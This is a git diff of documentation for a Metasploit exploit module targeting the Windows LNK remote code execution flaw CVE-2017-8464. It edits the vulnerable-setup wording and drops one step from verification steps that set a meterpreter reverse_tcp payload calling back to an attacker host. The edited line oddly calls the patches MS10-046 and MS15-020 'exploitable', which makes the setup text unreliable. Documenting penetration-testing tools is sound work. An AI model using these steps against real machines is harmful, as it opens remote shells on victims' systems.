diff --git a/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md b/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md index f3866db5b4..0feea675b2 100644 --- a/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md +++ b/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md @@ -7,7 +7,7 @@ A fix was released in the June 2017 Patch Tuesday. ## Vulnerable Setup -To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are installed. +To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are exploitable. ## Verification Steps @@ -16,7 +16,6 @@ To set up the vulnerable environment, install a Windows version without the patc 2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp` 3. `set LHOST [ip victim connects back to]` 4. `exploit -j` - 5. `back` ### Run the exploit